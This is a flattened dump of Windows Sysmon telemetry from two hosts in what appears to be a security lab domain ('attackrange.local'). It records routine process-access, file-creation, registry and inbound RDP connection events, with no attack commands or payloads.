14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000080104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.544{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 11241100x800000000000000080103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:33.482{A7A01FEF-EC18-607E-6A0E-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a4c-0\Microsoft.Office.Tools.Excel.Implementation.dll2021-04-20 14:58:33.482 354300x800000000000000080102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.759{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29473-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:31.007{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57670- 23542300x800000000000000080100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.247{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=217352C942ABF5341F58EC7C7F378DA3,SHA256=6697797ED87364CCDAF19D9AD22D9831A3FC335C4ADE06555A4D6547B0EA9931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050553Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:33.825{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02E0416CB4D6227FEA089C9137C98893,SHA256=D3BE5CC361A38969B404CAFF5699BAEE12BC3B32EF924EC7DCCD0504439A1BDE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.700{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1A-607E-740E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.700{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1A-607E-740E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1A-607E-740E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.654{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1A-607E-730E-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.638{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1A-607E-730E-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1A-607E-730E-00000000BB01}3632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:34.591{A7A01FEF-EC1A-607E-720E-00000000BB01}6260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1874-0\Microsoft.Office.Tools.Word.dll2021-04-20 14:58:34.591 23542300x800000000000000080179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.560{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000018.dbMD5=1B127AFAADD31500317F77E2A5679E56,SHA256=449197A8456768C90FBEE6F50C05A8C3F992FA880D917263836A7619EAF5306B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000080178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:34.544{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{eb67eac0-01cf-b24d-cb05-be7e70d951d2}\Root\InventoryApplicationFile\officec2rclient.|62d1554663c79908\BinProductVersion16.0.13127.21210 13241300x800000000000000080177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:34.544{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{eb67eac0-01cf-b24d-cb05-be7e70d951d2}\Root\InventoryApplicationFile\officec2rclient.|62d1554663c79908\LinkDate02/05/2021 13:01:54 13241300x800000000000000080176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:34.544{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{eb67eac0-01cf-b24d-cb05-be7e70d951d2}\Root\InventoryApplicationFile\officec2rclient.|62d1554663c79908\Publishermicrosoft corporation 13241300x800000000000000080175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:34.544{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe\REGISTRY\A\{eb67eac0-01cf-b24d-cb05-be7e70d951d2}\Root\InventoryApplicationFile\officec2rclient.|62d1554663c79908\LowerCaseLongPathc:\program files\common files\microsoft shared\clicktorun\officec2rclient.exe 13241300x800000000000000080174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDBSetValue2021-04-20 14:58:34.450{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeBinary Data 354300x800000000000000080173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:32.376{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55284-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.138{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1A-607E-720E-00000000BB01}6260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.122{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1A-607E-720E-00000000BB01}6260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.122{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1A-607E-720E-00000000BB01}6260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.091{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1A-607E-710E-00000000BB01}5336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.091{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1A-607E-710E-00000000BB01}5336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.091{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1A-607E-710E-00000000BB01}5336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:34.060{A7A01FEF-EC1A-607E-700E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11b4-0\Microsoft.Office.Tools.v4.0.Framework.dll2021-04-20 14:58:34.060 10341000x800000000000000080165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.029{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1A-607E-700E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.013{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1A-607E-700E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.013{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1A-607E-700E-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050555Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:31.238{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54331-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050554Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:34.013{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A46EEDA933343D9F53D90E854A07AD,SHA256=1420C57B774445467449B1B657AF1789CA6E2AF490038A7630138CEA003EC89A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 